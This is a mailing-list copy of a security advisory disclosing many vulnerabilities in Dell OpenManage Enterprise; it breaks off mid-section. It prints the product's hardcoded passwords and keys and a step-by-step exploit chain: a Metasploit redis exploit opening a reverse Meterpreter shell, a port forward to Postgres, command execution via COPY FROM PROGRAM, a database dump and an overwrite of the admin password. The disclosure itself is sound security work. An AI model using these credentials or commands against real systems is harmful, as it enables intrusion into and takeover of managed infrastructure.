lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CADxEXOgYrX7_ONqy=mMA7Ljm55TLGbLmbf4K7XVY+ZCh0xsLyg@mail.gmail.com>
Date: Mon, 19 Jul 2021 09:44:12 +0100
From: Pierre Kim <pierre.kim.sec@...il.com>
To: fulldisclosure <fulldisclosure@...lists.org>
Subject: [FD] Multiple vulnerabilities in Dell OpenManage Enterprise

Hello,

Please find a text-only version below sent to security mailing lists.

The complete version on "Multiple vulnerabilities in Dell OpenManage
Enterprise" is posted here:
  https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html


=== text-version of the advisory  ===

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

## Advisory Information

Title: Multiple vulnerabilities in Dell OpenManage Enterprise
Advisory URL: https://pierrekim.github.io/advisories/2021-dell-openmanage-enterprise-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html
Date published: 2021-07-19
Vendors contacted: Dell
Release mode: Coordinated-Disclosure
CVE: None yet assigned



## Product description

Dell EMC OpenManage Enterprise is an intuitive infrastructure
management console.
OpenManage Enterprise is a system management and monitoring
application that provides
a comprehensive view of the Dell EMC servers, chassis, storage, and
network switches on the enterprise network.

- From https://www.dell.com/support/kbdoc/en-sg/000175879/support-for-openmanage-enterprise:
Secure: Security is a top priority



## Vulnerabilities Summary

Vulnerable versions: all versions up to 3.6.1

The summary of the vulnerabilities is:

1. Hardcoded ActiveMQ credentials
2. Hardcoded ActiveMQ credentials for JMX
3. Hardcoded ActiveMQ keystore
4. Hardcoded JDBC Passwords
5. Hardcoded passwords for core_admin and replicator
6. KeyStore using hardcoded Key
7. Permissive ACL for Postgres
8. Local Privilege Escalation (as postgres) inside postgres docker
9. Remote Auth Bypass with 2 pre-auth RCEs in docker instances
10. Undocumented `system` account
11. Database key stored in the database
12. Weak permission on SSL/TLS Key
13. Multiple Local Privilege Escalations from `mcsimetricssvc` -
partially silently patched in version 3.6.1
14. Multiple Local Privilege Escalations from group `mcsitasksvc`
15. Multiple Local Privilege Escalations from group `tomcat`
16. Local Privilege Escalation from group `omctui`
17. Multiple TOCTOUs in "security_tool.sh" shell script
18. Incorrect access for tomcat
19. Grub password stored in postgres, without authentication for local user
20. Pre-auth and post-auth Java Deserializations - silently patched in
version 3.6.1
21. Idrac User


Miscellaneous notes:

We had forgotten these vulns until we saw some tweets regarding
`dbutil_2_3.sys` and
we reminded we still had unpublished research in Dell products.

This research was done a year ago (in July 2020) against OpenManage 3.4 and
we confirmed all the versions - including the latest version (3.6.1) -
are affected by the vulnerabilities.

When checking openmanage enterprise 3.5, we also found new
vulnerabilities (java stuff, grub, idrac).
When checking openmanage enterprise 3.6.1, it appears some
vulnerabilities were silently patched (java stuff and a LPE).

We also removed some potential vulnerabilities because their exploitations
were not straightforward due to the presence of SELinux.



## Details - Hardcoded ActiveMQ credentials

It is possible to retrieve hardcoded ActiveMQ credentials by reading
the `/opt/apache-activemq-5.*/conf/credentials.properties` file:

    [root@...nmanage-enterprise /]# cat
/opt/apache-activemq-5.*/conf/credentials.properties
    activemq.username=system
    activemq.password=manager
    guest.password=password

A new file (`credentials-enc.properties`, which was the file
`credentials.properties` in previous version of OpenManage) appeared
in the 3.5 version:

    [root@...nmanage-enterprise /]# cat
/opt/apache-activemq-5.*/conf/credentials-enc.properties
    activemq.username=system
    activemq.password=ENC(mYRkg+4Q4hua1kvpCCI2hg==)
    guest.password=ENC(Cf3Jf3tM+UrSOoaKU50od5CuBa8rxjoL)

Note: Prior to the 3.5 version, the file `credentials.properties`
contained the identical encrypted credentials, instead of clear-text
credentials:

    [root@...nmanage-enterprise /]# cat
/opt/apache-activemq-5.10.0/conf/credentials.properties
    activemq.username=system
    activemq.password=ENC(mYRkg+4Q4hua1kvpCCI2hg==)
    guest.password=ENC(Cf3Jf3tM+UrSOoaKU50od5CuBa8rxjoL)

In the latest version, it appears the passwords are now in clear-text.

ActiveMQ listen to all the public interfaces:

    [root@...nmanage-enterprise /]# ps -auxww|grep -i active
    ps -auxww|grep -i active
    activem+  1065  0.9  1.2 4042088 208636 ?      Sl   04:37   0:06
/usr/bin/java -Xms256m -Xmx512m
-Dorg.apache.activemq.SERIALIZABLE_PACKAGES=java.lang,javax.security,java.util,org.apache.activemq,org.fusesource.hawtbuf,com.thoughtworks.xstream.mapper,com.dell.enterprise.common.integration.lib.taskengine
-Dcom.sun.management.jmxremote -Djava.awt.headless=true
-Djava.io.tmpdir=/var/lib/activemq/tmp
-Dactivemq.classpath=/opt/apache-activemq-5.16.0//conf:/opt/apache-activemq-5.16.0//../lib/:
-Dactivemq.home=/opt/apache-activemq-5.16.0/
-Dactivemq.base=/opt/apache-activemq-5.16.0/
-Dactivemq.conf=/opt/apache-activemq-5.16.0//conf
-Dactivemq.data=/var/lib/activemq/data -jar
/opt/apache-activemq-5.16.0//bin/activemq.jar start

    [root@...nmanage-enterprise /]# netstat -laputen|grep 1065
    netstat -laputen|grep 1065
    tcp6       0      0 :::46403                :::*
 LISTEN      1000       27797      1065/java
    tcp6       0      0 :::61616                :::*
 LISTEN      1000       29817      1065/java

Luckily, the firewall blocks all incoming connections to these 2 ports.

Other credentials found:

    [root@...nmanage-enterprise /]# cat
/opt/apache-activemq-*/conf/jetty-realm.properties
    [...]
    # Defines users that can access the web (console, demo, etc.)
    # username: password [,rolename ...]
    admin: admin, admin
    user: user, user

Furthermore, SELinux doesn't allow users to read
`/opt/apache-activemq-5.*/conf/` files - still the passwords are
hardcoded.



## Details - Hardcoded ActiveMQ credentials for JMX

Java Management Extensions (JMX) allows remote debugging of java applications.

These files contain the hardcoded passwords in clear-text for JMX
access to ActiveMQ.
Even if they have wrong permissions, SELinux doesn't allow regular
users to read `/opt/apache-activemq-5.*/conf/` files.
Still the passwords are hardcoded, as shown below:

    [root@...nmanage-enterprise /]# ls -la /opt/apache-activemq-5.16.0/conf/jmx*
    -rwxr-xr-x. 1 root root 965 Sep 25  2020
/opt/apache-activemq-5.16.0/conf/jmx.access
    -rwxr-xr-x. 1 root root 964 Sep 25  2020
/opt/apache-activemq-5.16.0/conf/jmx.password

    [root@...nmanage-enterprise /]# tail -n 1
/opt/apache-activemq-5.16.0/conf/jmx.access
    admin readwrite

    [root@...nmanage-enterprise /]# tail -n 1
/opt/apache-activemq-5.16.0/conf/jmx.password
    admin activemq

It is interesting to note that the path of ActiveMQ changes, from old
version to the recent one,
indicating activemq is updated for every new release of Open Manage
Enterprise but the hardcoded credentials are never changed.



## Details - Hardcoded ActiveMQ keystore

We can find several hardcoded keystore files inside
`/opt/apache-activemq-5.16.0/conf`:

    [root@...nmanage-enterprise conf]# ls -la *ts *ks
    -rwxr-xr-x. 1 root root 1370 Sep 25  2020 broker.ks
    -rwxr-xr-x. 1 root root  665 Sep 25  2020 broker.ts
    -rwxr-xr-x. 1 root root 1357 Sep 25  2020 client.ks
    -rwxr-xr-x. 1 root root  665 Sep 25  2020 client.ts
    [root@...nmanage-enterprise conf]# sha256sum *ts *ks
    1c17bb3b5d1335a0821eb5b9c8c1de7331219619416c9d31a6b775e232bf4456  broker.ts
    1c17bb3b5d1335a0821eb5b9c8c1de7331219619416c9d31a6b775e232bf4456  client.ts
    718d056b1a5518abf2a5ab38d0e81eb6d41c3187d93c7c54817fcb20503b0c8c  broker.ks
    ce0d36c002d9912dc5f7344353735277d0af15630199ec91e96eef29a5acd3f4  client.ks

The permissions are wrong (644) but SELinux doesn't allow regular
users to read `/opt/apache-activemq-5.*/conf/` files.
Still the files are hardcoded.

Also, the password for the keystore file (`broker.ks`) is defined in
the `jetty.xml` file, with 644 permission:

    <property name="keyStorePath" value="${activemq.conf}/broker.ks" />
    <property name="keyStorePassword" value="password" />

The hardcoded password for the keystore is `password`.



## Details - Hardcoded JDBC Passwords

The passwords is hardcoded (`Dell123$`) and can't be changed:

    [root@...nmanage-enterprise /]# cat
/opt/dell/mcsi/webapps/api/WEB-INF/classes/jdbc.properties
    hibernate.connection.url=jdbc:postgresql://localhost:5432/enterprisedb
    hibernate.connection.username=core_admin
    hibernate.connection.password=Dell123$

Wrong permissions but SELinux again blocks any read attempt.

    [root@...nmanage-enterprise /]# ls -la
/opt/dell/mcsi/webapps/api/WEB-INF/classes/jdbc.properties
    -rwxrwxr-x. 1 root root 151 Sep 25  2020
/opt/dell/mcsi/webapps/api/WEB-INF/classes/jdbc.properties

In previous versions (before 3.5), it was also possible to extract the
password from the files
`/opt/dell/mcsi/lib/db/scripts/mcsi/sysconfigdao/TSQL/9000_attribute_registry
- About.txt` and
`/opt/dell/mcsi/lib/db/scripts/mcsi/sysconfigdao/TSQL/9040_default_data_sysconfig_templates
- About.txt`.
These 2 files contained:

    [...]
    Create a new Data Source using "PostgreSQL Unicode(x64)"

    Data Source:    LexingtonLocal
    Database:               enterprisedb
    Server:                 localhost
    User Name:              core_admin
    Password:               Dell123$  <---------- password
    SSL Mode:               disabled
    Port:                   5432
    Driver:                 PostgreSQL ODBC Driver(UNICODE)

    Alter the "Datasource" within Options of the new data source
    Bools as Char:  OFF
    Unknown Sizes:  Longest
    [...]

    There will be a couple errors that are fixed by replacing 'select'
with 'perform' at the line numbers given by the errors.

    [...]
    declare @serverName nvarchar(256) = N'LEXINGTON';
    declare @dataSourceName nvarchar(256) = N'LexingtonLocal';
    declare @userName nvarchar(256) = N'core_admin';
    declare @password nvarchar(256) = N'Dell123$'; <------ password
    [...]


These files don't exist anymore in version 3.5.

Interestingly, `Dell123$` is the provided password in the documentation files:

- From `/opt/dell/omc/webapps/omc/console/omcOnlineHelp/en/GUID-0A8DECB1-C2E7-4904-A071-FEC75D6A54C7.html`:

    Must contain at least one character in: uppercase, lowercase,
digit, and special character. For example, Dell123$

The command `grep -ri 'Dell123\$' /opt/` as root will list several
files containing this password.



## Details - Hardcoded passwords for core_admin and replicator

The `/opt/dell/mcsi/lib/db/scripts/mcsi/00_core/01CreateDB/01RoleCreation.sql`
script has wrong permissions and
contains hardcoded clear-text passwords for the creation of roles in postgres:

- - replicator, with password `Password123$`,
- - core_admin, with password `md5292f7d66e18e0128fa11bebb95c467a6` as
`UNENCRYPTED PASSWORD` is being used instead of `ENCRYPTED PASSWORD`.


    [root@...nmanage-enterprise /]# cat
/opt/dell/mcsi/lib/db/scripts/mcsi/00_core/01CreateDB/01RoleCreation.sql

    -- Role: "core_admin"

    -- DROP ROLE core_admin;

    --CREATE ROLE core_admin LOGIN
    --  ENCRYPTED PASSWORD 'md564f6b341503abb8ca26367630f233b22'
    --  NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE;

    --  CREATE ROLE replicator LOGIN
    --  ENCRYPTED PASSWORD 'md5a7c4e11df28c56eac643ace589e81d4e'
    --  NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE REPLICATION;

     CREATE ROLE core_admin LOGIN
      UNENCRYPTED PASSWORD 'md5292f7d66e18e0128fa11bebb95c467a6'
      SUPERUSER INHERIT NOCREATEDB NOCREATEROLE;

     CREATE ROLE replicator LOGIN
      UNENCRYPTED PASSWORD 'Password123$'
      NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE REPLICATION;



## Details - KeyStore using hardcoded Key

By default, only the passwords for servers/idrac/appliances inside the
postgres database are encrypted using a keystore containing a secret
key.

This keystore file is located in
`/opt/dell/mcsi/appliance/config/security/keystore.p12`.

At first, it seems insecure because its permissions are wrong (664)
but this file is in fact protected by SELinux:

    [root@...nmanage-enterprise /]# ls -la
/opt/dell/mcsi/appliance/config/security/keystore.p12
    -rw-rw-r--+ 1 root root 313 May 16 04:06
/opt/dell/mcsi/appliance/config/security/keystore.p12

SELinux policy:

    /opt/dell/mcsi/appliance/config/security/keystore\.p12	--	system_u:object_r:mcsi_appliance_secret_t:s0

Nonetheless, the password of the keystore is hardcoded:

- From `/opt/dell/omc/scripts/runonce/update_keystorepassword_runonce.sh`:

    [root@...nmanage-enterprise /]# cat
/opt/dell/omc/scripts/runonce/update_keystorepassword_runonce.sh
    [...]
    /usr/java/latest/bin/keytool -storepasswd -new
"7673D238EBF23E51EC18E9D9B5DAB299" -storepass "changeit" -keystore
/opt/dell/mcsi/appliance/config/security/keystore.p12
    [...]
    /usr/java/latest/bin/keytool -alias "secretKey" -keypasswd -new
"7673D238EBF23E51EC18E9D9B5DAB299" -keypass "changeit" -storepass
"7673D238EBF23E51EC18E9D9B5DAB299" -keystore
/opt/dell/mcsi/appliance/config/security/keystore.p12

The password `7673D238EBF23E51EC18E9D9B5DAB299` was found in all
versions of OpenManage and it works:

    [root@...nmanage-enterprise /]# openssl pkcs12 -info -in
/opt/dell/mcsi/appliance/config/security/keystore.p12
    Enter Import Password: [7673D238EBF23E51EC18E9D9B5DAB299]
    MAC Iteration 100000
    MAC verified OK
    PKCS7 Data
    Warning unsupported bag type: secretBag

We can also find the original password `changeit` for the keystore
inside the `/opt/dell/mcsi/appliance/scripts/ca/importCert.exp`
script:

    [root@...nmanage-enterprise /]# cat
/opt/dell/mcsi/appliance/scripts/ca/importCert.exp
    [...]
    spawn /usr/java/latest/bin/keytool -import -alias localhost -file
/etc/pki/tls/certs/localhost.crt -keystore
/usr/java/latest/lib/security/cacerts
    match_max 100000
    expect -exact "Enter keystore password:  "
    send -- "changeit\r"
    expect -exact "Trust this certificate? \[no\]:  "
    send -- "yes\r"
    sleep 3



## Details - Permissive ACL for Postgres

- From the files `/opt/dell/mcsi/lib/db/data/pg_hba.conf.core` and
`/opt/dell/mcsi/lib/db/data/pg_hba.conf.trust`,
the entire docker IP range (`169.254.255.1/24`) has a full access to
postgres, without password (`trust`)

    [root@...nmanage-enterprise /]# cat
/opt/dell/mcsi/lib/db/data/pg_hba.conf.trust
    # TYPE  DATABASE    USER        CIDR-ADDRESS          METHOD

    # "local" is for Unix domain socket connections only
    local   all         postgres                           trust
    local   replication     rep
     trust
    # IPv4 local connections:
    host    all         postgres					127.0.0.1/32	trust
    host		all					postgres					169.254.255.1/24	trust
    host    replication     rep                     169.254.255.1/24
     trust

    # IPv4 & IPv6 local connections:
    host    all     all     127.0.0.1/32       trust
    host		all			all			169.254.255.1/24	trust

    host    all     all     ::1/128       trust
    #host replication     all     172.18.100.0/16     md5
    #hostssl     replication     all     172.18.100.0/16     md5
    host    all     postgres     ::1/128          trust
    [root@...nmanage-enterprise /]# cat
/opt/dell/mcsi/lib/db/data/pg_hba.conf.core
    # TYPE  DATABASE    USER        CIDR-ADDRESS          METHOD

    # "local" is for Unix domain socket connections only
    local	postgres		postgres		 				trust
    host	enterprisedb	core_admin		::1/128			trust
    host	enterprisedb	core_admin		127.0.0.1/32	trust
    host	enterprisedb	core_admin		169.254.255.1/24	trust
    local	enterprisedb	core_admin						trust

    local	replication     rep                                             trust
    host	replication     rep                     169.254.255.1/24        trust


In fact, no password is being used by the solution to manage the
database, as shown below:

    [root@...nmanage-enterprise /]# cat
/var/etc/opt/dell/mcsi/logjdbc.properties
    postgresql.connection.url=jdbc:postgresql://localhost:5432/enterprisedb
    postgresql.connection.username=core_admin
    postgresql.connection.password=

A compromise of a docker instance will likely provide a full access to
the Postgres database (see
"Remote Auth Bypass with 2 pre-auth RCEs in docker instances" for a demo).

Also, it it possible to see that authentication for Posgtres in the
device is mainly based on IP:

    [root@...nmanage-enterprise /]# cat
/opt/dell/omc/scripts/execute_db_script.sh
    #!/usr/bin/env bash

    dbHost=localhost
    dbUser=core_admin
    dbName=enterprisedb
    dbPort="5432"
    psql_arguments=()
    [...]

No authentication is being defined in this shell script.



## Details - Local Privilege Escalation (as postgres) inside postgres docker

By default, some ACLs allow to connect to Postgres without a password.

A local unprivileged user (e.g.: `nobody`) inside the host or inside
any docker instances
running in the appliance will get code execution as `postgres` inside
the postgres docker.
He will also get a full control over the database, so a full control
over the appliance.

It is possible to reach the postgres database on localhost, thanks to
a `docker-proxy` daemon:

    [root@...nmanage-enterprise /]# ps -auxww|grep proxy | grep 5432
    root      1340  0.3  0.0 448608 13184 ?        Sl   04:37   0:36
/usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 5432
-container-ip 169.254.255.2 -container-port 5432

It is also possible to reach the postgres database using the IP of the
docker instance:

    [nobody@...nmanage-enterprise /]$ psql -d enterprisedb -h
169.254.255.2 -U core_admin -p 5432
    psql (11.9, server 11.6)
    Type "help" for help.

    enterprisedb=# \l
                                        List of databases
         Name     |   Owner    | Encoding |   Collate   |    Ctype
|   Access privileges
    --------------+------------+----------+-------------+-------------+-----------------------
     enterprisedb | core_admin | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
     postgres     | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
     template0    | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8
| =c/postgres          +
                  |            |          |             |
| postgres=CTc/postgres
     template1    | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8
| =c/postgres          +
                  |            |          |             |
| postgres=CTc/postgres
    (4 rows)

    enterprisedb=# \q

    [nobody@...nmanage-enterprise /]$ psql -d enterprisedb -h
127.0.0.1 -U core_admin -p 5432
    psql (11.9, server 11.6)
    Type "help" for help.

    enterprisedb=# \l
                                        List of databases
         Name     |   Owner    | Encoding |   Collate   |    Ctype
|   Access privileges
    --------------+------------+----------+-------------+-------------+-----------------------
     enterprisedb | core_admin | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
     postgres     | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
     template0    | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8
| =c/postgres          +
                  |            |          |             |
| postgres=CTc/postgres
     template1    | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8
| =c/postgres          +
                  |            |          |             |
| postgres=CTc/postgres
    (4 rows)

    enterprisedb=# \q

It is then possible to get code execution inside the postgres docker,
without authentication:

    [nobody@...nmanage-enterprise /]$ psql -d enterprisedb -h
127.0.0.1 -U core_admin -p 5432
    psql (11.9, server 11.6)
    Type "help" for help.

    enterprisedb=# DROP TABLE IF EXISTS cmd_exec;
    NOTICE:  table "cmd_exec" does not exist, skipping
    DROP TABLE
    enterprisedb=# CREATE TABLE cmd_exec(cmd_output text);
    CREATE TABLE
    enterprisedb=# COPY cmd_exec FROM PROGRAM 'id';
    COPY 1
    enterprisedb=# SELECT * FROM cmd_exec;
                                 cmd_output
    --------------------------------------------------------------------
     uid=26(postgres) gid=26(postgres) groups=26(postgres),26(postgres)
    (1 row)



## Details - Remote Auth Bypass with 2 pre-auth RCEs in docker instances

There is a chain of pre-auth vulnerabilities allowing to:
- - get a shell on the redis container, as `redis`
- - get a shell on the postgres container, as `postgres`
- - get a full access to the postgres database
- - bypass authentication on the web interface as admin

Due to some requirements in the exploit chain, the attacker needs to  be
on the same subnet as the target (same LAN, without  a  gateway  between
the target  and  the  attacker).

The attack scenario is:
1. attacker will own the redis running in a container inside the virtual machine
   running Dell OpenManage Enterprise and get a shell inside this container
2. attacker will use the shell inside the redis container as a relay
to get access
   to the remote postgresql server
3. attacker will get a shell on the postgresql server
4. attacker will redefine a new password for the web interface and will dump
   the entire postgresql server
5. attacker will get an access on the web interface as admin

The network flow is:

Attacker(192.168.1.102) -> redis(169.254.255.3, routed by
192.168.1.100) -> Posgres(169.254.255.2)

IPs used in this setup:

- - 192.168.1.100: target virtual machine running Dell OpenManage Enterprise.
- - 192.168.1.102: attacker machine, running Kali.

Internal IPs inside Dell OpenManage Enterprise, by default, already
configued by the solution:

- - 169.254.255.2 is the internal IP of the postgres container running
inside the virtual machine
  running Dell OpenManage Enterprise.
- - 169.254.255.3 is the internal IP of the redis container running
inside the virtual machine
  running Dell OpenManage Enterprise.

    [root@...nmanage-enterprise /]# docker ps
    CONTAINER ID        IMAGE                              COMMAND
             CREATED             STATUS              PORTS
                   NAMES
    ecf97860f111        redis:latest
"docker-entrypoint.s"   2 hours ago         Up 2 hours
127.0.0.1:6379->6379/tcp             redis
    e1e82315ec5b        mcsi/omeproductionimage:2.6.0.43
"docker-entrypoint.s"   2 hours ago         Up 2 hours
2345/tcp, 127.0.0.1:5432->5432/tcp   primarydatabase

Shell and Metasploit session:

It is required to add a route to the internal IP of the redis container
running inside OpenManage Enterprise:

    kali# route add -host 169.254.255.3 gw 192.168.1.100
    kali# traceroute -nI 169.254.255.3
    traceroute to 169.254.255.3 (169.254.255.3), 30 hops max, 60 byte packets
     1  192.168.1.100  0.775 ms  0.762 ms  1.060 ms
     2  169.254.255.3  1.911 ms  1.922 ms  1.893 ms

On the 3.6.1 version, pings are now dropped. Using `tcptraceroute`:

    kali# tcptraceroute 169.254.255.3 6379
    Running:
    	traceroute -T -O info -p 6379 169.254.255.3
    traceroute to 169.254.255.3 (169.254.255.3), 30 hops max, 60 byte packets
     1  192.168.1.100 (192.168.1.100)  0.489 ms  0.440 ms  0.545 ms
     2  169.254.255.3 (169.254.255.3) <syn,ack>  0.852 ms  0.821 ms  0.720 ms

An attacker can now reach the redis and postgres docker instances
because iptables is not correctly configured and
allow the 2 services to be reachable from the WAN. Also, by default,
IP forwarding is enabled:

    [root@...nmanage-enterprise /]# sysctl net.ipv4.conf.all.forwarding
    net.ipv4.conf.all.forwarding = 1

Why not directly reaching Postgres ?
By default, ACLs defined in Postgres configuration only allow
connections from the `169.254.255.0/24` range,
thus it is required to reach the redis interface available on the
`169.254.255.3` IP and then use redis as a relay to reach the postgres
instance.

    local postgres    postgres            trust
    host  enterprisedb  core_admin    ::1/128     trust
    host  enterprisedb  core_admin    127.0.0.1/32  trust
    host  enterprisedb  core_admin    169.254.255.1/24  trust
    local enterprisedb  core_admin            trust

    local replication     rep                                             trust
    host  replication     rep                     169.254.255.1/24        trust

When trying to connect directly to the IP of Postgres, we can see it
is ACL-blocked (after adding a route to `169.254.255.2`):

    kali# psql -d enterprisedb -h 169.254.255.2 -U core_admin -p 5432
    kali# psql: error: could not connect to server: FATAL:  no
pg_hba.conf entry for host "192.168.1.102", user "core_admin",
database "enterprisedb", SSL off

We can test if we can reach directly the redis daemon, running inside
the redis docker:

    kali# telnet 169.254.255.3 6379
    Trying 169.254.255.3...
    Connected to 169.254.255.3.
    Escape character is '^]'.
    TEST
    -ERR unknown command `TEST`, with args beginning with:
    config set dir /tmp
    +OK
    ^]q
    telnet> q
    Connection closed.

We can reach redis, time to get RCE using master/slave replication
using metasploit.

On the attacker machine, it is required to update the
`/usr/share/metasploit-framework/modules/exploits/linux/redis/redis_unauth_exec.rb`
file
to use a writable directory for the user `redis`:

Patch `/usr/share/metasploit-framework/modules/exploits/linux/redis/redis_unauth_exec.rb`
to add:

    131a132
    >     redis_command('CONFIG', 'SET', 'dir', '/tmp')


Metasploit session:

    kali# msfconsole
    msf5 > use exploit/linux/redis/redis_unauth_exec
    msf5 exploit(linux/redis/redis_unauth_exec) > set SRVHOST 192.168.1.102
    SRVHOST => 192.168.1.102
    msf5 exploit(linux/redis/redis_unauth_exec) > set LHOST 192.168.1.102
    LHOST => 192.168.1.102
    msf5 exploit(linux/redis/redis_unauth_exec) > set RHOSTS 169.254.255.3
    RHOSTS => 169.254.255.3
    msf5 exploit(linux/redis/redis_unauth_exec) > run

    [*] Started reverse TCP handler on 192.168.1.102:4444
    [*] 169.254.255.3:6379    - Compile redis module extension file
    [+] 169.254.255.3:6379    - Payload generated successfully!
    [*] 169.254.255.3:6379    - Listening on 192.168.1.102:6379
    [*] 169.254.255.3:6379    - Rogue server close...
    [*] 169.254.255.3:6379    - Sending command to trigger payload.
    [*] Sending stage (3021284 bytes) to 192.168.1.100
    [*] Meterpreter session 1 opened (192.168.1.102:4444 ->
192.168.1.100:60572) at 2020-07-11 12:59:57 -0400
    [!] 169.254.255.3:6379    - This exploit may require manual
cleanup of './mkmiq.so' on the target

    meterpreter > ls
    Listing: /tmp
    =============

    Mode              Size   Type  Last modified              Name
    ----              ----   ----  -------------              ----
    100644/rw-r--r--  46808  fil   2020-07-09 08:59:55 -0400  mkmiq.so

    meterpreter > shell
    Process 19 created.
    Channel 1 created.
    id
    uid=999(redis) gid=999(redis) groups=999(redis)
    exit
    meterpreter >

Note, with a recent metasploit, the exploit has been moved to
`exploit/linux/redis/redis_replication_cmd_exec`.

The diff is now:

    diff /usr/share/metasploit-framework/modules/exploits/linux/redis/redis_replication_cmd_exec.rb
    137a138
    >     redis_command('CONFIG', 'SET', 'DIR', '/tmp')

This works with all openmanage version (up to the latest version - 3.6.1).

After getting a shell as `redis` inside the redis docker, it is time
to add a port forwarding
to the postgresql, in order to bypass ACLs:

    meterpreter > portfwd add -l 5432 -p 5432 -r 169.254.255.2
    [*] Local TCP relay created: :5432 <-> 169.254.255.2:5432

On another shell, an attacker will get code execution inside the PGSQL
container:

    kali# psql -d enterprisedb -h 127.0.0.1 -U core_admin -p 5432
    psql (12.1 (Debian 12.1-2), server 11.6)
    Type "help" for help.

    enterprisedb-# \l
                                        List of databases
         Name     |   Owner    | Encoding |   Collate   |    Ctype
|   Access privileges
    --------------+------------+----------+-------------+-------------+-----------------------
     enterprisedb | core_admin | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
     postgres     | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
     template0    | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8
| =c/postgres          +
                  |            |          |             |
| postgres=CTc/postgres
     template1    | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8
| =c/postgres          +
                  |            |          |             |
| postgres=CTc/postgres
    (4 rows)

    enterprisedb=# DROP TABLE IF EXISTS cmd_exec;
    DROP TABLE
    enterprisedb=# CREATE TABLE cmd_exec(cmd_output text);
    CREATE TABLE
    enterprisedb=# COPY cmd_exec FROM PROGRAM 'id';
    COPY 1
    enterprisedb=# SELECT * FROM cmd_exec;
                          cmd_output
    -------------------------------------------------------
     uid=26(postgres) gid=26(postgres) groups=26(postgres)
    (1 row)

    enterprisedb=#


Dump of database:

    kali# pg_dump -d enterprisedb -h 127.0.0.1 -U core_admin > dump.sql

Time to redefine the administrator password:

Passwords are located in `encryptedstring` table:

    kali# psql -d enterprisedb -h 127.0.0.1 -U core_admin -p 5432
    enterprisedb=# SELECT * FROM encryptedstring;
    3 | $2a$10$.hbHnOt6crprUoAO2PMJxerc8nQ12SJ.jxgM8JgZiuLIfkCVNgSqe
    4 | system
    1 | $2a$10$bzBdUKXFdlb0U7Hl.w6XIuQFKQQr0Qgi165KN2TaaOemlaAe.OuU2
    2 | admin

Change admin password into `x`:

    kali# psql -d enterprisedb -h 127.0.0.1 -U core_admin -p 5432
    enterprisedb=# UPDATE encryptedstring SET
encrypteddata='$2a$10$XXXXXXXXXXXXXXXXXXXXXOQhTG4aUZ8kSMBOnpMruh17xTsANIaT6'
WHERE id=1;
    UPDATE 1
    enterprisedb=#

Now, use `admin` / `x` on the web interface ( http://192.168.1.100/ ).

After reversing some java code, passwords are blowfish 10 rounds:

    kali# python3
    Python 3.7.5 (default, Oct 27 2019, 15:43:29)
    [GCC 9.2.1 20191022] on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import bcrypt
    >>> passwd = b'x'
    >>> salt = b'$2a$10$XXXXXXXXXXXXXXXXXXXXXXXXX' # or
bcrypt.gensalt(rounds=10)
    >>> hashed = bcrypt.hashpw(passwd, salt)
    >>> print(hashed)
    b'$2a$10$XXXXXXXXXXXXXXXXXXXXXOQhTG4aUZ8kSMBOnpMruh17xTsANIaT6'
    >>>

The main takeways in this setup are:

- - Incorrect iptables firewall for Postgres and Redis - only the main
IP of the appliance is
  correctly firewalled, docker instances have these 2 ports open
- - IP forwarding is enabled
- - Lack of authentication for Redis,
- - Lack of authentication for Postgres, only based on IP with an
errror when defining the netmask:
  `169.254.255.1/24` is being used instead of `169.254.255.1/32` or
`169.254.255.0/24`
- - Incorrect ACL for Postgres
- - SELinux is useless in this case because all actions are legit
- - Custom 'encryption' everywhere to waste time



## Details - Undocumented `system` account

There is likely an undocumented system account in all openmanage
versions, as shown below:

We can list the users from the postgres database:

    enterprisedb=# select * from user_entity;
    id   | user_type_id | directory_server_id | user_name |
description | pwcredential_id | email | isenabled | locked |
enable_smart_card | ca_certificate | user_certificate |
default_account | object_guid | object_sid | id_owner
    -------+--------------+---------------------+-----------+-------------+-----------------+-------+-----------+--------+-------------------+----------------+------------------+-----------------+-------------+------------+---------
    10066 |            1 |                     | admin     | admin
  |               1 |       | t         | f      | f                 |
    10068 |            1 |                     | system    | system
  |               2 |       | t         | f      | f                 |

    enterprisedb=# select * from passwordcredential;
    id |             dtype              | label  | usernameid |
passwordid | domainid |         updatedate
    ----+--------------------------------+--------+------------+------------+----------+----------------------------
      2 | HashedPasswordCredentialEntity | system |          4 |
   3 |          | 2020-07-11 18:08:50.207+00
      1 | HashedPasswordCredentialEntity | admin  |          2 |
   1 |          | 2020-07-11 18:14:41.012+00
    (2 rows)

    kali# psql -d enterprisedb -h 127.0.0.1 -U core_admin -p 5432
    enterprisedb=# SELECT * FROM encryptedstring;
     id |                        encrypteddata
    ----+--------------------------------------------------------------
      3 | $2a$10$.hbHnOt6crprUoAO2PMJxerc8nQ12SJ.jxgM8JgZiuLIfkCVNgSqe
      4 | system
      2 | admin
      1 | $2a$10$XXXXXXXXXXXXXXXXXXXXXOQhTG4aUZ8kSMBOnpMruh17xTsANIaT6

Also from dump.sql:

